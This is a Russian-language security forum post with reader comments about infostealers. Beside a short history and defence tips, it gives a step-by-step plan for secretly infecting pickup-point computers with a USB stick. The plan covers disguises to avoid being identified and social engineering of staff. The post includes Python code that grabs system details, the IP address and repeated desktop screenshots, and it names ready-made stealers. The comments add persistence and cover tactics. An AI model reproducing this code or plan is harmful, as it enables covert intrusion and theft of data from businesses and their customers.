Статья Что такое Стиллеры? | Как защитить свои данные от кражи и как они работают

Введение
image(3).webp

Приветствую всех, кто стремится к глубокому пониманию кибербезопасности! Сегодня мы погрузимся в крайне актуальную и потенциально опасную тему — стиллеры. Что же это такое и как злоумышленники могут использовать их для атак на компании и частных лиц? Подчеркну, что вся информация предоставляется исключительно в образовательных целях, чтобы помочь представителям бизнеса серьезнее взглянуть на защиту своей информации. Запомните ребятки:
THE DEMON IS ESPECIALLY POWERFUL, WHEN YOU CAN'T SEE HIM
Неустанно буду это повторять эту фразу, ибо только она передаёт всю картину, как она есть. Стилер - это крыса в вашей системе, тихая, практически невидимая, которая ворует вашу информацию.

Стиллеры: невидимая угроза вашей безопасности

Стиллеры представляют собой вредоносное программное обеспечение, разработанное для незаметной кражи конфиденциальных данных, включая пароли, логины, данные банковских карт и другую персональную информацию. Эти вредоносные программы способны скрытно работать на компьютерах и мобильных устройствах, регистрируя вводимые пользователем данные и отправляя их киберпреступникам. Важно знать, что стиллеры могут быть интегрированы в легитимное на первый взгляд программное обеспечение или распространяться через фишинговые рассылки, скомпрометированные веб-сайты и вредоносные загрузки.

Запомните эту ключевую мысль: "Враг особенно силен, когда он невидим." Эта фраза как нельзя лучше отражает суть угрозы, которую несут стиллеры — тихие и незаметные "крысы" в вашей системе, похищающие ценную информацию.

Краткий экскурс в историю стиллеров

Первые версии стиллеров появились в начале 2000-х годов и были нацелены на сбор учетных данных из веб-браузеров, таких как логины и пароли. Со временем функциональность стиллеров значительно расширилась. Они научились извлекать данные из различных приложений, включая FTP-клиенты и мессенджеры. Настоящий же расцвет стиллеров пришелся на 2010-е годы. Именно в этот период они стали одной из наиболее распространенных форм вредоносного ПО. Появились такие печально известные образцы, как Zeus и SpyEye, которые использовали сложные техники для обхода систем безопасности и сбора больших объемов данных.

Современные тенденции в мире стиллеров

Несмотря на развитие технологий и совершенствование систем безопасности, стиллеры остаются актуальной угрозой, поскольку человеческий фактор по-прежнему играет ключевую роль в большинстве успешных атак. Можно с уверенностью сказать, что стиллеры никуда не исчезнут, хотя распространять их на пользовательские устройства становится все сложнее. Современные стиллеры могут использовать шифрование для маскировки своей активности и обхода антивирусных программ, однако это лишь временная мера до выхода очередного обновления защиты.

Заражаем Корпорации (теоретически)
image(2).webp

Поиск уязвимых систем для проведения успешной атаки начинается с определения потенциальных целей. Очевидно, что такими целями являются компьютеры, и если задуматься, то на ум приходят разнообразные общественные места, включая маркетплейсы. Давайте рассмотрим подробнее алгоритм действий.

Хочу поделиться своим опытом о состоянии компьютеров в пунктах выдачи заказов (ПВЗ). Как правило, там установлена "чистая" версия Windows без антивирусного программного обеспечения, но при этом часто сохранены личные страницы пользователей в социальных сетях, таких как ВКонтакте, и аккаунты Google. Откуда мне это известно? В прошлом я работал системным администратором для нескольких индивидуальных предпринимателей, и это наблюдение основано на личном опыте. Впрочем, это не главное.

Аналогичные действия могут быть реализованы и в других общественных местах, например, в цветочных магазинах, кафе и в целом в любых местах скопления людей. Успех зависит исключительно от вашей наблюдательности и умения адаптироваться к ситуации.
  • Вы заказываете абсолютно ненужный товар за копейки, будто зубная щётка или набор зубочисток.
  • Вы пишите небольшой стилер на Python (Данный стилер будет "отправлять" вам скриншот рабочего стола каждые 5 секунд и файлик с конфигурацией докучи (отправку в тг или на почту сами реализуете, тем более автозапуск, это чисто пример))
Python:
import os
import win32api
import requests
import time
import sys
import platform
from PIL import ImageGrab

def main():
    drives = str(win32api.GetLogicalDriveStrings())
    drives = str(drives.split('\000')[:-1])
    response = requests.get("https://ident.me").text
    all_data = "Time: " + time.asctime() + '\n' + "Кодировка ФС: " + sys.getfilesystemencoding() + '\n' + "Cpu: " + platform.processor() + '\n' + "Система: " + platform.system() + ' ' + platform.release() + '\nIP: '+requests.get("https://ident.me").text+'\nДиски:' + str(drives)
    file = open(os.getenv("APPDATA") + '\\alldata.txt', "w+")
    file.write(all_data)
    file.close()

def screenshoot():
    while True:
        time.sleep(5)
        screen = ImageGrab.grab()
        screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')

if __name__ == "__main__":
    main()
    screenshoot()
  • Теперь вы загружаете его на флешку.
  • Одеваете новую одежду или ту что не жалко, очки и шляпа будут не лишними, вставляем камешек в ботинок (для изменения нашей походки) и одеваем перчатки
  • Идём в ближайший пункт выдачи заказов любого маркетплейса
Важно отметить, что чтобы нам удалось такое провернуть, стол должен иметь не слишком защищённую спину, так чтобы мы могли видеть заднюю часть пк, как правило, пк стоят под столом.
  • Показываем QR и пока сотрудник отлучился на склад, вставляем флешку. (Немного социальной инженерии)
Если у вас 80 lvl социальной инженерии, вы можете даже уговорить сотрудника самому запустить зловред:oops:
Если нет, то здесь есть очень неприятный момент, чтобы запустить файл нужно либо запустить самому, либо чтобы при инпуте флешки exe файл запускался сам (да ещё нужно будет обернуть его через pyinstaller в exe).
Либо, вы можете использовать один из готовых стилеров (строго в образовательных целях):
  1. Acrid
  2. ScarletStealer
  3. SYS01
  4. sAINT
Однако, если вам такое интересно, то я выпущую 2 часть с практической частью, где мы протестируем это всё в деле и напишем свой более проработаный стилер, всё зависит от заинтересованости в такой статье и лайках.
Если походить и позарожать так несколько пунктов, то можно очень сильно поставить под угрозу чей-то бизнес, я уж молчу о троянах типа того же NjRat. А таких вот столов с открытым доступом к заднему корпусу ПК миллиарды и скорее всего ваш ПВЗ у дома не стал исключением.

Защита от стиллера
image.webp

Итак, сейчас попробуем защититься от стилера.
  • Регулярные обновления ПО - это намного важнее, чем может показаться на первый взгляд. Устаревшее ПО и ОС часто содержат уязвимости, которые могут быть использованы стилерами.
  • Использование антивируса - Не пожалейте пару кровных и купите надёжный антивирус. В будущем это убережёт вас от большинства проблем.
  • Осторожность с соц. сетями - Не скачивайте всё подряд, да да да.
  • Настройка брандмауэра - Так даже если зловред попадёт на ваш ПК, то его ждёт поражение в виде брандмауэра.
  • Обучение базе - НАУЧИТЕ ПОЛЬЗОВАТЕЛЕЙ КОМПЬЮТЕРНОЙ БЕЗОПАСНОСТИ УЖЕ!!! Когда новые сотрудники приходят на такую работу, зачастую они не умеют пользоваться ПК, из-за чего, заражают корпоративную тачку.
  • Ну и в свойствах Windows отключите автозапуск чего-либо по умолчанию.

Заключение

Этот небольшой обзор – лишь первый шаг. Если эта тема вам откликнулась, и вы хотите глубже изучить методы противодействия киберугрозам, оставляйте свои комментарии и пожелания. Что еще вам интересно узнать? Какие аспекты кибербезопасности требуют нашего пристального внимания? Ваши вопросы и предложения станут основой для новых, еще более практичных материалов.

На форуме Codeby мы вместе разбираем актуальные вопросы кибербезопасности, от основ пентестинга до тонкостей защиты от новейших уязвимостей. Присоединяйтесь к нашему сообществу, чтобы получать ценные знания, обмениваться опытом и расти в сфере информационной безопасности. Делитесь своими мыслями – вместе мы сделаем интернет безопаснее! Всем отличного дня и безопасного серфинга!
 
Последнее редактирование:
  • Нравится
Реакции: TR1X, BadBunny и UseR-
На счет ставить флешку на пвз такое себе ) вас спалят камеры да и скрипт отвалится рано или поздно ) Но понятно, что автор привел это как пример, для подачи информации. Спасибо )
 
на счет ставить флешку на пвз такое себе ) вас спалят камеры да и скрипт отвалится рано или поздно ) Но понятно, что автор привел это как пример, для подачи информации. Спасибо )
Да, спалят, но если создать exe так чтобы он вкручивался в автозагрузку и был демоном, то вероятность маленькая, либо можно что-то якобы "уронить" и тогда подозрений возникнуть не должно, просто имейте ввиду что это всё теория, а если мы наберём больше количество лайков и актива на этой статье, то я свяжусь с одним из ИП и мы согласуем такую авантюру и узнаем.
 
  • Нравится
Реакции: TR1X
Да, спалят, но если создать exe так чтобы он вкручивался в автозагрузку и был демоном, то вероятность маленькая, либо можно что-то якобы "уронить" и тогда подозрений возникнуть не должно, просто имейте ввиду что это всё теория, а если мы наберём больше количество лайков и актива на этой статье, то я свяжусь с одним из ИП и мы согласуем такую авантюру и узнаем.
а вот это уже прикольно ) главное сохранять границу, где это "проверка" "пранк" а где статья :)
 
  • Нравится
Реакции: Menschenfresser
Да, спалят, но если создать exe так чтобы он вкручивался в автозагрузку и был демоном, то вероятность маленькая, либо можно что-то якобы "уронить" и тогда подозрений возникнуть не должно, просто имейте ввиду что это всё теория, а если мы наберём больше количество лайков и актива на этой статье, то я свяжусь с одним из ИП и мы согласуем такую авантюру и узнаем.
Можно устроится на ПВЗ :) Так делают хакеры, когда могут устроится и взять какие то данные для заказчика.
 
  • Нравится
Реакции: Menschenfresser
Можно устроится на ПВЗ :) Так делают хакеры, когда могут устроится и взять какие то данные для заказчика.
Это весьма проблематично, так как сотрудник не всегда нужен, да и вряд ли хочется отдавать свои данные ИП и Компании, ради одной цели, поймают...
 
  • Нравится
Реакции: TR1X
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!